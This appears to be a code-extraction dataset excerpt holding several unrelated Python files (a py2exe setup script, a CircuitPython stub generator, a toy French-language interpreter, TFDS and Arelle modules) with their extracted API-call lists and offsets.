'Topic :: Internet :: WWW/HTTP',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python',
'Operating System :: OS Independent',
),
install_requires = (
'requests',
)
)
if __name__ == '__main__':
setup(**args)
|
[
"os.path.isfile",
"distutils.util.get_platform",
"glob.glob",
"os.path.join",
"subprocess.check_call",
"shutil.copy",
"os.path.abspath",
"os.path.splitdrive",
"codecs.open",
"py2exe.build_exe.py2exe.run",
"os.path.dirname",
"os.path.normpath",
"distutils.core.setup",
"os.path.basename",
"winreg.QueryValueEx",
"os.path.expandvars",
"winreg.OpenKey",
"re.compile",
"os.path.isabs",
"distutils.util.execute",
"warnings.filterwarnings",
"os.getcwd"
] |
[((1480, 1544), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""', '"""Unknown distribution option"""'], {}), "('ignore', 'Unknown distribution option')\n", (1503, 1544), False, 'import warnings\n'), ((2014, 2047), 're.compile', 're.compile', (['"""\\\\(released (.+)\\\\)"""'], {}), "('\\\\(released (.+)\\\\)')\n", (2024, 2047), False, 'import re\n'), ((1637, 1659), 'os.path.normpath', 'os.path.normpath', (['path'], {}), '(path)\n', (1653, 1659), False, 'import os\n'), ((2157, 2193), 'os.path.join', 'os.path.join', (['"""doc"""', '"""changelog.txt"""'], {}), "('doc', 'changelog.txt')\n", (2169, 2193), False, 'import os\n'), ((2788, 2807), 'distutils.util.get_platform', 'util.get_platform', ([], {}), '()\n', (2805, 2807), False, 'from distutils import util\n'), ((3981, 4006), 'shutil.copy', 'shutil.copy', (['path', 'target'], {}), '(path, target)\n', (3992, 4006), False, 'import shutil\n'), ((15440, 15474), 'os.path.join', 'os.path.join', (['"""doc"""', '"""authors.txt"""'], {}), "('doc', 'authors.txt')\n", (15452, 15474), False, 'import os\n'), ((16865, 16878), 'distutils.core.setup', 'setup', ([], {}), '(**args)\n', (16870, 16878), False, 'from distutils.core import setup, Distribution\n'), ((1906, 1925), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (1919, 1925), False, 'import os\n'), ((3163, 3190), 'os.path.expandvars', 'os.path.expandvars', (['progvar'], {}), '(progvar)\n', (3181, 3190), False, 'import os\n'), ((3930, 3941), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3939, 3941), False, 'import os\n'), ((7043, 7054), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7052, 7054), False, 'import os\n'), ((8523, 8629), 'distutils.util.execute', 'util.execute', (['write_file', '(filename, data)', "('creating %s' % filename)", '(self.verbose >= 1)', 'self.dry_run'], {}), "(write_file, (filename, data), 'creating %s' % filename, self.\n verbose >= 1, self.dry_run)\n", (8535, 8629), False, 'from distutils import util\n'), ((9539, 9580), 'os.path.abspath', 'os.path.abspath', (['"""doc\\\\icon\\\\favicon.ico"""'], {}), "('doc\\\\icon\\\\favicon.ico')\n", (9554, 9580), False, 'import os\n'), ((12646, 12689), 'shutil.copy', 'shutil.copy', (['"""scripts\\\\modpath.iss"""', '"""dist"""'], {}), "('scripts\\\\modpath.iss', 'dist')\n", (12657, 12689), False, 'import shutil\n'), ((12927, 12970), 'subprocess.check_call', 'subprocess.check_call', (['[cmd, self.pathname]'], {}), '([cmd, self.pathname])\n', (12948, 12970), False, 'import subprocess\n'), ((13186, 13209), 'os.path.isfile', 'os.path.isfile', (['pfxfile'], {}), '(pfxfile)\n', (13200, 13209), False, 'import os\n'), ((13925, 13975), 'winreg.OpenKey', 'winreg.OpenKey', (['winreg.HKEY_LOCAL_MACHINE', 'sub_key'], {}), '(winreg.HKEY_LOCAL_MACHINE, sub_key)\n', (13939, 13975), False, 'import winreg\n'), ((15484, 15521), 'codecs.open', 'codecs.open', (['authorfile', '"""r"""', '"""utf-8"""'], {}), "(authorfile, 'r', 'utf-8')\n", (15495, 15521), False, 'import codecs\n'), ((1951, 1981), 'os.path.join', 'os.path.join', (['sys.prefix', 'path'], {}), '(sys.prefix, path)\n', (1963, 1981), False, 'import os\n'), ((3692, 3707), 'glob.glob', 'glob.glob', (['path'], {}), '(path)\n', (3701, 3707), False, 'import glob\n'), ((4492, 4516), 'os.path.basename', 'os.path.basename', (['infile'], {}), '(infile)\n', (4508, 4516), False, 'import os\n'), ((7863, 7874), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7872, 7874), False, 'import os\n'), ((12195, 12217), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', 
(12211, 12217), False, 'import os\n'), ((13276, 13317), 'os.path.join', 'os.path.join', (['path', '"""bin"""', '"""signtool.exe"""'], {}), "(path, 'bin', 'signtool.exe')\n", (13288, 13317), False, 'import os\n'), ((13333, 13357), 'os.path.isfile', 'os.path.isfile', (['signtool'], {}), '(signtool)\n', (13347, 13357), False, 'import os\n'), ((14037, 14067), 'winreg.QueryValueEx', 'winreg.QueryValueEx', (['key', 'name'], {}), '(key, name)\n', (14056, 14067), False, 'import winreg\n'), ((14432, 14454), 'py2exe.build_exe.py2exe.run', 'py2exe_build.run', (['self'], {}), '(self)\n', (14448, 14454), True, 'from py2exe.build_exe import py2exe as py2exe_build\n'), ((5533, 5569), 'os.path.join', 'os.path.join', (['val', '"""share"""', '"""dosage"""'], {}), "(val, 'share', 'dosage')\n", (5545, 5569), False, 'import os\n'), ((7113, 7140), 'os.path.join', 'os.path.join', (['cwd', '"""config"""'], {}), "(cwd, 'config')\n", (7125, 7140), False, 'import os\n'), ((13446, 13472), 'subprocess.check_call', 'subprocess.check_call', (['cmd'], {}), '(cmd)\n', (13467, 13472), False, 'import subprocess\n'), ((11745, 11767), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (11761, 11767), False, 'import os\n'), ((5743, 5766), 'os.path.splitdrive', 'os.path.splitdrive', (['val'], {}), '(val)\n', (5761, 5766), False, 'import os\n'), ((5894, 5926), 'os.path.join', 'os.path.join', (['cmd_obj.root', 'tail'], {}), '(cmd_obj.root, tail)\n', (5906, 5926), False, 'import os\n'), ((11433, 11454), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (11448, 11454), False, 'import os\n')]
|
import os
import pathlib
import re
import glob
import json
# This is a script for using circuitpython's repo to make pyi files for each board type.
# These need to be bundled with the extension, which means that adding new boards is still
# a new release of the extension.
# First thing we want to do is store in memory, the contents of
# ./circuitpython/circuitpython-stubs/board/__init__.py so we can append it to
# every other board.
board_stub = pathlib.Path(os.path.join("./stubs/board", "__init__.pyi"))
# See [Issue #26](https://github.com/joedevivo/vscode-circuitpython/issues/26)
# for more on this.
generic_stubs = {}
with open(board_stub) as stub:
stubs = stub.readlines()
i = 0
f = []
for s in stubs:
if s.startswith('def'):
f.append(i)
i += 1
f.append(i)
x = f.pop(0)
for y in f:
it = ' ' + ''.join(stubs[x:y-1])
r = re.search(r'def ([^\(]*)\(', it)
k = r[1]
generic_stubs[k] = it
x = y
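# For reference, the loop above maps each function name in the generic board
# stub to its full definition text; e.g. (the sample stub line is an assumption):
#   re.search(r'def ([^\(]*)\(', "def deinit() -> None:")[1]  ->  'deinit'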
# now, while we build the actual board stubs, replace any line that starts with ` $name:` with value
board_dirs = glob.glob("circuitpython/ports/*/boards/*")
boards = []
for b in board_dirs :
site_path = os.path.split(b)[-1]
config = pathlib.Path(os.path.join(b, "mpconfigboard.mk"))
print(config)
pins = pathlib.Path(os.path.join(b, "pins.c"))
if config.is_file() and pins.is_file():
usb_vid = ""
usb_pid = ""
usb_product = ""
usb_manufacturer = ""
with open(config) as conf:
for line in conf:
if line.startswith("USB_VID"):
usb_vid = line.split("=")[1].split("#")[0].strip('" \n')
elif line.startswith("USB_PID"):
usb_pid = line.split("=")[1].split("#")[0].strip('" \n')
elif line.startswith("USB_PRODUCT"):
usb_product = line.split("=")[1].split("#")[0].strip('" \n')
elif line.startswith("USB_MANUFACTURER"):
usb_manufacturer = line.split("=")[1].split("#")[0].strip('" \n')
if usb_manufacturer == "Nadda-Reel Company LLC":
continue
board = { 'vid': usb_vid, 'pid': usb_pid, 'product': usb_product, 'manufacturer': usb_manufacturer, 'site_path': site_path }
boards.append(board)
print("{0}:{1} {2}, {3}".format(usb_vid, usb_pid, usb_manufacturer, usb_product))
board_pyi_path = pathlib.Path(os.path.join("boards", usb_vid, usb_pid))
board_pyi_path.mkdir(parents=True, exist_ok=True)
board_pyi_file = pathlib.Path(os.path.join(board_pyi_path, "board.pyi"))
# Indent 0 char for the first pin, 2 for the rest
indent = ""
# We're going to put the common stuff from the generic board stub at the
# end of the file, so we'll collect them after the loop
board_stubs = {}
with open(board_pyi_file, 'w') as outfile, open(pins) as p:
outfile.write("from typing import Any\n")
outfile.write('"""\n')
outfile.write('board {0} {1}\n'.format(board['manufacturer'], board['product']))
outfile.write('https://circuitpython.org/boards/{0}\n'.format(board['site_path']))
outfile.write('"""\n')
outfile.write(" board.")
for line in p:
pin = re.search(r'.*_QSTR\(MP_QSTR_([^\)]*)', line)
      if pin is None:
continue
pin_name = pin[1]
if pin_name in generic_stubs:
board_stubs[pin_name] = generic_stubs[pin_name]
continue
else:
outfile.write("{0}{1}: Any = ...\n".format(indent, pin_name))
#redefine indent every time
indent = " "
# End for
for p in board_stubs:
outfile.write("{0}\n".format(board_stubs[p]))
json_file = pathlib.Path(os.path.join("boards", "metadata.json"))
with open(json_file, 'w') as metadata:
json.dump(boards, metadata)
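# The resulting metadata.json is a flat list of board records; one entry looks
# like this (field values are illustrative, not taken from a real board):
#   {"vid": "0x1234", "pid": "0x5678", "product": "Example Board",
#    "manufacturer": "Example Corp", "site_path": "example_board"}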
|
[
"json.dump",
"re.search",
"glob.glob",
"os.path.split",
"os.path.join"
] |
[((1118, 1161), 'glob.glob', 'glob.glob', (['"""circuitpython/ports/*/boards/*"""'], {}), "('circuitpython/ports/*/boards/*')\n", (1127, 1161), False, 'import glob\n'), ((512, 557), 'os.path.join', 'os.path.join', (['"""./stubs/board"""', '"""__init__.pyi"""'], {}), "('./stubs/board', '__init__.pyi')\n", (524, 557), False, 'import os\n'), ((3663, 3702), 'os.path.join', 'os.path.join', (['"""boards"""', '"""metadata.json"""'], {}), "('boards', 'metadata.json')\n", (3675, 3702), False, 'import os\n'), ((3745, 3772), 'json.dump', 'json.dump', (['boards', 'metadata'], {}), '(boards, metadata)\n', (3754, 3772), False, 'import json\n'), ((919, 952), 're.search', 're.search', (['"""def ([^\\\\(]*)\\\\("""', 'it'], {}), "('def ([^\\\\(]*)\\\\(', it)\n", (928, 952), False, 'import re\n'), ((1210, 1226), 'os.path.split', 'os.path.split', (['b'], {}), '(b)\n', (1223, 1226), False, 'import os\n'), ((1256, 1291), 'os.path.join', 'os.path.join', (['b', '"""mpconfigboard.mk"""'], {}), "(b, 'mpconfigboard.mk')\n", (1268, 1291), False, 'import os\n'), ((1333, 1358), 'os.path.join', 'os.path.join', (['b', '"""pins.c"""'], {}), "(b, 'pins.c')\n", (1345, 1358), False, 'import os\n'), ((2338, 2378), 'os.path.join', 'os.path.join', (['"""boards"""', 'usb_vid', 'usb_pid'], {}), "('boards', usb_vid, usb_pid)\n", (2350, 2378), False, 'import os\n'), ((2468, 2509), 'os.path.join', 'os.path.join', (['board_pyi_path', '"""board.pyi"""'], {}), "(board_pyi_path, 'board.pyi')\n", (2480, 2509), False, 'import os\n'), ((3156, 3202), 're.search', 're.search', (['""".*_QSTR\\\\(MP_QSTR_([^\\\\)]*)"""', 'line'], {}), "('.*_QSTR\\\\(MP_QSTR_([^\\\\)]*)', line)\n", (3165, 3202), False, 'import re\n')]
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import semantic_version
LATEST_FORMAT_VERSION = '2.4'
def check_version(version):
latest = get_latest_version()
supported = semantic_version.Version(str(latest.major), partial=True)
requested = semantic_version.Version.coerce(str(version))
if supported.major != requested.major:
msg = 'Unsupported Dynamic UI format version: ' \
'requested format version {0} is not compatible with the ' \
'supported family {1}'
raise ValueError(msg.format(requested, supported))
if requested > latest:
msg = 'Unsupported Dynamic UI format version: ' \
'requested format version {0} is newer than ' \
'latest supported {1}'
raise ValueError(msg.format(requested, latest))
def get_latest_version():
return semantic_version.Version.coerce(LATEST_FORMAT_VERSION)
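# A minimal usage sketch (the version strings below are assumptions):
if __name__ == '__main__':
    check_version('2.0')        # same major family as 2.4, not newer: accepted
    for bad in ('3.0', '2.5'):  # wrong family / newer than latest: rejected
        try:
            check_version(bad)
        except ValueError as exc:
            print(exc)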
|
[
"semantic_version.Version.coerce"
] |
[((1420, 1474), 'semantic_version.Version.coerce', 'semantic_version.Version.coerce', (['LATEST_FORMAT_VERSION'], {}), '(LATEST_FORMAT_VERSION)\n', (1451, 1474), False, 'import semantic_version\n')]
|
from typing import List, Optional
from huoguoml.schema.experiment import Experiment
from huoguoml.server.entity.experiment import ExperimentORM
from huoguoml.server.entity.run import RunORM
from huoguoml.server.repository.experiment import ExperimentRepository
from huoguoml.server.service import Service
class ExperimentService(Service):
def __init__(self, artifact_dir: str):
super(ExperimentService, self).__init__(artifact_dir=artifact_dir)
self.repository = ExperimentRepository(database_url=self.database_url,
connect_args=self.connect_args)
def get_experiments(self) -> List[ExperimentORM]:
return self.repository.get_experiments()
def get_experiment(self, experiment_name: str) -> Optional[ExperimentORM]:
return self.repository.get_experiment(experiment_name=experiment_name)
def get_experiment_run(self, experiment_name: str, experiment_run_nr: int) -> Optional[RunORM]:
return self.repository.get_experiment_run(experiment_name=experiment_name,
experiment_run_nr=experiment_run_nr)
def update_experiment(self, experiment_name: str, experiment: Experiment) -> Optional[ExperimentORM]:
experiment_orm = self.repository.update_experiment(experiment_name=experiment_name, experiment=experiment)
return experiment_orm
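# A hedged usage sketch (the artifact directory and the printed attribute are
# assumptions; the repository also needs the database configured by the
# Service base class to be reachable):
#
#   service = ExperimentService(artifact_dir='/tmp/huoguoml')
#   for experiment in service.get_experiments():
#       print(experiment.name)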
|
[
"huoguoml.server.repository.experiment.ExperimentRepository"
] |
[((488, 577), 'huoguoml.server.repository.experiment.ExperimentRepository', 'ExperimentRepository', ([], {'database_url': 'self.database_url', 'connect_args': 'self.connect_args'}), '(database_url=self.database_url, connect_args=self.\n connect_args)\n', (508, 577), False, 'from huoguoml.server.repository.experiment import ExperimentRepository\n')]
|
import sys
import os.path
import time
import re
print("STALINIUM V1 PAR ALEXDIEU")
if len(sys.argv) > 1:
file = sys.argv[1]
if os.path.isfile(file):
pass
else:
print("Error , File doesn't exist !")
else:
file = input(">>>")
variables = {}
lignes = []
try:
with open(file, "r") as f:
for index, value in enumerate(f.readlines()):
lignes.append(value.strip("\n"))
lignes = [i for i in lignes if i]
except:
lignes.append(file)
def lts(a):
    return ' '.join(a)
def CHEZCFIRST(mot, ligne):
exitp = False
sec = ''
prem = ''
try:
prem = ligne.partition(mot)[0]
exitp = True
except:
return True
if exitp == True:
if prem.isspace() == True:
return True
elif prem == '' or prem == None:
return True
else:
return False
def calc(ligne: list) -> float:
tried2 = True
try:
if ligne[2] == "+":
return float(ligne[1]) + float(ligne[3])
if ligne[2] == "-":
return float(ligne[1]) - float(ligne[3])
if ligne[2] == "*":
return float(ligne[1]) * float(ligne[3])
if ligne[2] == "/":
return float(ligne[1]) / float(ligne[3])
if ligne[2] == "**":
return float(ligne[1]) ** float(ligne[3])
if ligne[2] == "//":
return float(ligne[1]) % float(ligne[3])
else:
            check_if(ligne)
except:
        try:
            # Check the two-character operators first so that "2**3" is not
            # mis-reported as a "*" error.
            for ope in ("**", "//", "+", "-", "*", "/"):
                if ope in ligne[1]:
                    prems = ligne[1].partition(ope)[0]
                    sec = ligne[1].partition(ope)[2]
                    return("ERROR 1: numbers must be separated from the operator with spaces, like this: " + prems + " " + ope + " " + sec)
            if tried2 == True:
                return("ERROR 2: unknown operator!: " + lignes[0])
            else:
                check_if(ligne)
        except:
            return "ERROR 7: NO CALCULATION GIVEN"
def check_if(ligne: list) -> float:
args = []
tried2 = True
try:
for arg in ligne[1:]:
args.append(arg)
if args[1] == "?=":
if args[0] == args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == "<":
if args[0] < args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == ">":
if args[0] > args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == "<=":
if args[0] <= args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == "!=":
if args[0] != args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == ">=":
if args[0] >= args[2]:
return "Vrai"
else:
return "Faux"
        else:
            if tried2 == True:
                return("ERROR 2: unknown operator!: " + args[1])
            else:
                calc(ligne)
    except:
        return "ERROR 7: NO CONDITION GIVEN"
def scan(lignes: list):
for ligne in lignes:
sortie = []
check = ''
bon = False
ans = False
split_ligne = ligne.split()
if "montre" in ligne:
ans = False
ans = CHEZCFIRST("montre", ligne)
if ans == True:
lit = " ".join(split_ligne[1:])
if ":" in lit:
check = lit.partition(":")[0]
check = check[-1:]
if check == "\\":
pass
else:
erreurs = 0
erreur = []
erN = []
ni = False
name = lit.partition(":")[2]
name = name.split()
NAME = ''
NAMEV = ''
ende = len(name)
for i in range(0, ende):
NAME = NAME + '-' + name[i]
if i == 0:
NAMEV = NAMEV + ':' + name[i]
else:
NAMEV = NAMEV + ' ' + name[i]
if NAME in variables:
erreurs = erreurs + 1
erreur.append(NAME)
erN.append(NAMEV)
else:
pass
if len(erreur) == 0:
ni = True
print("ERREUR 6 : VARIABLE N'EXISTE PAS")
if len(erreur) == 1:
ni = True
val = variables[erreur[0]]
lit = lit.replace(NAMEV, val, 1)
if len(erreur) == 2:
ni = True
print("ATTENTION : DEUX VARIABLES ONT UN NOM SIMILIAIRE AU DEBUT : "+ erN[0] +" et "+ erN[1] +" ! STALINIUM prends la première par défault ! ")
val = variables[erreur[0]]
lit = lit.replace(NAMEV, val, 1)
else:
if ni == False:
print("ATTENTION : PLUSIEURS VARIABLES ONT UN NOM SIMILIAIRE AU DEBUT ! STALINIUM prends la première par défault ! ")
val = variables[erreur[0]]
lit = lit.replace(NAMEV, val, 1)
else:
pass
if "\\:" in lit:
lit = lit.replace("\\:", ":")
else:
pass
print(lit)
bon = True
else:
pass
if "calcul" in ligne:
ans = False
ans = CHEZCFIRST("calcul", ligne)
if ans == True:
print(calc(split_ligne))
bon = True
else:
pass
if "si" in ligne:
ans = False
ans = CHEZCFIRST("si", ligne)
if ans == True:
print(check_if(split_ligne))
bon = True
else:
pass
if "sortir" in ligne:
ans = False
exitp = False
sec = ''
prem = ''
try:
prem = ligne.partition("sortir")[0]
sec = ligne.partition("sortir")[2]
exitp = True
except:
exit()
if exitp == True:
if sec.isspace() == True and prem.isspace() == True:
exit()
                elif (sec == '' or sec is None) and (prem == '' or prem is None):
exit()
else:
pass
if 'dors' in ligne:
listDORS = []
ans = False
ans = CHEZCFIRST("dors", ligne)
if ans == True:
try:
bon = int(" ".join(split_ligne[1]))
except:
print("ERREUR 3 : Mauvaise SYNTAXE pour DORS : DORS + TEMPS // exemple : dors 2")
try:
listDORS = split_ligne
listDORS.remove(str(bon))
listDORS.remove("dors")
arg = lts(listDORS)
except:
print("DORS ARG : IMPOSSIBLE DE CONVERTIR EN LITTERAIRE ")
arg = ''
if arg != '':
print(arg)
else:
pass
time.sleep(bon)
bon = True
else:
pass
if "pause" in ligne:
ans = False
ans = CHEZCFIRST("pause", ligne)
if ans == True:
pause = False
sec = ''
prem = ''
try:
prem = ligne.partition("pause")[0]
sec = ligne.partition("pause")[2]
pause = True
except:
input("Pause ...")
if pause == True:
sec = sec[1:]
if prem.isspace() == True:
input(sec + "...")
elif prem == '' or prem == None:
input(sec + "...")
else:
pass
bon = True
if ":" in ligne:
NAME = ''
verif = ligne.partition(":")[0]
if verif == '' or verif.isspace() == True:
try:
verif2 = ligne.partition("=")[2]
if verif2 == '' or verif2.isspace() == True:
try:
namevar = ligne.partition(":")[2]
namevar = namevar.split()
ende = len(namevar)
for i in range(0, ende):
NAME = NAME + '-' + namevar[i]
try:
print(variables[NAME])
except:
print("ERREUR 6 VARIABLE N'EXISTE PAS")
except:
print("ERREUR 6 VARIABLE NON DEFINIE !")
else:
namevar = ligne.partition(":")[2]
namevar = namevar.split()
ende = len(namevar)
stop = 100000
NAME = ''
STOCK = ''
if namevar[0] == '=':
print("ERREUR 6 NOM DE VARIABLE NON DEFINIE")
else:
for i in range(0, ende):
if namevar[i] == '=':
stop = i
elif stop < i:
pass
else:
NAME = NAME + '-' + namevar[i]
for i in range(0, ende):
if i <= stop:
pass
elif stop + 1 == i:
STOCK = STOCK + namevar[i]
else:
STOCK = STOCK + ' ' + namevar[i]
try:
variables[NAME] = STOCK
except:
print("ERREUR ?? : erreur inconnue")
except:
print("ERREUR 6 VARIABLE N'A PAS DE DEFINITION")
else:
pass
else:
if "if" in ligne:
if bon == True:
pass
else:
v = ligne.partition("if")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour si :"," si " + v)
bon = True
if "print" in ligne:
if bon == True:
pass
else:
v = ligne.partition("print")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour montrer :"," montre " + v)
bon = True
if "output" in ligne:
if bon == True:
pass
else:
v = ligne.partition("output")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour montrer :"," montre " + v)
bon = True
if "operat" in ligne:
if bon == True:
pass
else:
v = ligne.partition(" ")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour calcul :"," calcul " + v)
bon = True
if "exit" in ligne:
if bon == True:
pass
else:
print("ERREUR 3 : On est pas en Angleterre ici ! Pour sortir :"," sortir")
bon = True
if "calcul" in ligne:
bon = True
pass
else:
if bon == True:
pass
else:
print("Uh , je n'arrive pas a déterminer ce que fait cette commande : " + ligne)
if ".cccp" in file:
lignes = []
if os.path.isfile(file):
with open(file, "r") as f:
for index, value in enumerate(f.readlines()):
lignes.append(value.strip("\n"))
lignes = [i for i in lignes if i]
scan(lignes)
else:
lignes.append(file)
scan(lignes)
else:
lignes = []
lignes.append(file)
scan(lignes)
lignes = []
while True:
file = input(">>>")
lignes = []
if ".cccp" in file:
lignes = []
if os.path.isfile(file):
with open(file, "r") as f:
for index, value in enumerate(f.readlines()):
lignes.append(value.strip("\n"))
lignes = [i for i in lignes if i]
scan(lignes)
else:
lignes.append(file)
scan(lignes)
else:
lignes.append(file)
scan(lignes)
|
[
"time.sleep"
] |
[((9553, 9568), 'time.sleep', 'time.sleep', (['bon'], {}), '(bon)\n', (9563, 9568), False, 'import time\n')]
|
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Wrapper around `tfds build`."""
import argparse
from typing import List
from absl import app
from absl import flags
from absl import logging
from tensorflow_datasets.scripts.cli import main as main_cli
module_import = flags.DEFINE_string(
'module_import', None, '`--imports` flag'
)
builder_config_id = flags.DEFINE_integer(
'builder_config_id', None, '`--config_idx` flag'
)
def _parse_flags(argv: List[str]) -> argparse.Namespace:
"""Command lines flag parsing."""
return main_cli._parse_flags([argv[0], 'build'] + argv[1:]) # pylint: disable=protected-access
_display_warning = True
def main(args: argparse.Namespace) -> None:
if _display_warning:
logging.warning(
'***`tfds build` should be used instead of `download_and_prepare`.***'
)
if module_import.value:
args.imports = module_import.value
if builder_config_id.value is not None:
args.config_idx = builder_config_id.value
main_cli.main(args)
if __name__ == '__main__':
app.run(main, flags_parser=_parse_flags)
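# Example invocation (the dataset name is an assumption); the remaining argv is
# forwarded to `tfds build`:
#
#   python download_and_prepare.py mnist --module_import=my_pkg.my_datasets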
|
[
"tensorflow_datasets.scripts.cli.main._parse_flags",
"absl.logging.warning",
"absl.flags.DEFINE_string",
"absl.app.run",
"absl.flags.DEFINE_integer",
"tensorflow_datasets.scripts.cli.main.main"
] |
[((838, 900), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""module_import"""', 'None', '"""`--imports` flag"""'], {}), "('module_import', None, '`--imports` flag')\n", (857, 900), False, 'from absl import flags\n'), ((927, 997), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""builder_config_id"""', 'None', '"""`--config_idx` flag"""'], {}), "('builder_config_id', None, '`--config_idx` flag')\n", (947, 997), False, 'from absl import flags\n'), ((1108, 1160), 'tensorflow_datasets.scripts.cli.main._parse_flags', 'main_cli._parse_flags', (["([argv[0], 'build'] + argv[1:])"], {}), "([argv[0], 'build'] + argv[1:])\n", (1129, 1160), True, 'from tensorflow_datasets.scripts.cli import main as main_cli\n'), ((1553, 1572), 'tensorflow_datasets.scripts.cli.main.main', 'main_cli.main', (['args'], {}), '(args)\n', (1566, 1572), True, 'from tensorflow_datasets.scripts.cli import main as main_cli\n'), ((1604, 1644), 'absl.app.run', 'app.run', (['main'], {'flags_parser': '_parse_flags'}), '(main, flags_parser=_parse_flags)\n', (1611, 1644), False, 'from absl import app\n'), ((1296, 1388), 'absl.logging.warning', 'logging.warning', (['"""***`tfds build` should be used instead of `download_and_prepare`.***"""'], {}), "(\n '***`tfds build` should be used instead of `download_and_prepare`.***')\n", (1311, 1388), False, 'from absl import logging\n')]
|
from operator import mul
try:
reduce
except NameError:
from functools import reduce
import numpy as np
def logit(x):
return np.log(x) - np.log(1 - x)
def logitsum(xs):
total = 0
for x in xs:
total += logit(x)
return total
def prod(*x):
return reduce(mul, x, 1)
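# Quick sanity checks (illustrative): logit maps 0.5 to 0, so a list of
# fifty-fifty probabilities sums to 0, and prod multiplies its arguments.
if __name__ == '__main__':
    assert logit(0.5) == 0.0
    assert logitsum([0.5, 0.5]) == 0.0
    assert prod(2, 3, 4) == 24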
|
[
"functools.reduce",
"numpy.log"
] |
[((286, 303), 'functools.reduce', 'reduce', (['mul', 'x', '(1)'], {}), '(mul, x, 1)\n', (292, 303), False, 'from functools import reduce\n'), ((139, 148), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (145, 148), True, 'import numpy as np\n'), ((151, 164), 'numpy.log', 'np.log', (['(1 - x)'], {}), '(1 - x)\n', (157, 164), True, 'import numpy as np\n')]
|
'''
Created on June 6, 2018
Filer Guidelines: esma32-60-254_esef_reporting_manual.pdf
Taxonomy Architecture:
Taxonomy package expected to be installed:
@author: Mark V Systems Limited
(c) Copyright 2018 Mark V Systems Limited, All rights reserved.
'''
import re
from arelle import ModelDocument, XbrlConst
from arelle.ModelDtsObject import ModelConcept
from arelle.ModelObject import ModelObject
from .Const import qnDomainItemType, standardTaxonomyURIs
def checkFilingDTS(val, modelDocument, visited):
visited.append(modelDocument)
for referencedDocument, modelDocumentReference in modelDocument.referencesDocument.items():
if referencedDocument not in visited and referencedDocument.inDTS: # ignore non-DTS documents
checkFilingDTS(val, referencedDocument, visited)
if (modelDocument.type == ModelDocument.Type.SCHEMA and
(modelDocument.uri.startswith(val.modelXbrl.uriDir) or
not any(modelDocument.uri.startswith(standardTaxonomyURI) for standardTaxonomyURI in standardTaxonomyURIs))):
val.hasExtensionSchema = True
tuplesInExtTxmy = []
typedDimsInExtTxmy = []
domainMembersWrongType = []
extLineItemsWithoutHypercube = []
extAbstractConcepts = []
if modelDocument.targetNamespace is not None:
for modelConcept in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.w3.org/2001/XMLSchema}element"):
if isinstance(modelConcept,ModelConcept):
name = modelConcept.get("name")
if name is None:
name = ""
if modelConcept.get("ref") is not None:
continue # don't validate ref's here
if modelConcept.isTuple:
tuplesInExtTxmy.append(modelConcept)
if modelConcept.isTypedDimension:
typedDimsInExtTxmy.append(modelConcept)
if modelConcept.isDomainMember and modelConcept in val.domainMembers and modelConcept.typeQname != qnDomainItemType:
domainMembersWrongType.append(modelConcept)
if modelConcept.isPrimaryItem and not modelConcept.isAbstract and modelConcept not in val.primaryItems:
extLineItemsWithoutHypercube.append(modelConcept)
if modelConcept.isAbstract and modelConcept not in val.domainMembers:
extAbstractConcepts.append(modelConcept)
# what is language of standard label?
label = modelConcept.label(lang="en", fallbackToQname=False)
if label:
# allow Joe's Bar, N.A. to be JoesBarNA -- remove ', allow A. as not article "a"
lc3name = ''.join(re.sub(r"['.-]", "", (w[0] or w[2] or w[3] or w[4])).title()
for w in re.findall(r"((\w+')+\w+)|(A[.-])|([.-]A(?=\W|$))|(\w+)", label)
# if w[4].lower() not in ("the", "a", "an")
)
if not(name == lc3name or
(name and lc3name and lc3name[0].isdigit() and name[1:] == lc3name and (name[0].isalpha() or name[0] == '_'))):
val.modelXbrl.warning("esma.3.2.1.extensionTaxonomyElementNameDoesNotFollowLc3Convention",
_("Extension taxonomy element name SHOULD follow the LC3 convention: %(concept)s should match expected LC3 composition %(lc3name)s"),
modelObject=modelConcept, concept=modelConcept.qname, lc3name=lc3name)
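                        # E.g. a label "Property, plant and equipment" yields the
                        # expected LC3 name "PropertyPlantAndEquipment"; when
                        # lc3name starts with a digit, one extra leading letter
                        # or "_" is tolerated on the element name.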
if tuplesInExtTxmy:
val.modelXbrl.error("esma.2.1.3.tupleDefinedInExtensionTaxonomy",
_("Tuples MUST NOT be defined in extension taxonomy: %(concepts)s"),
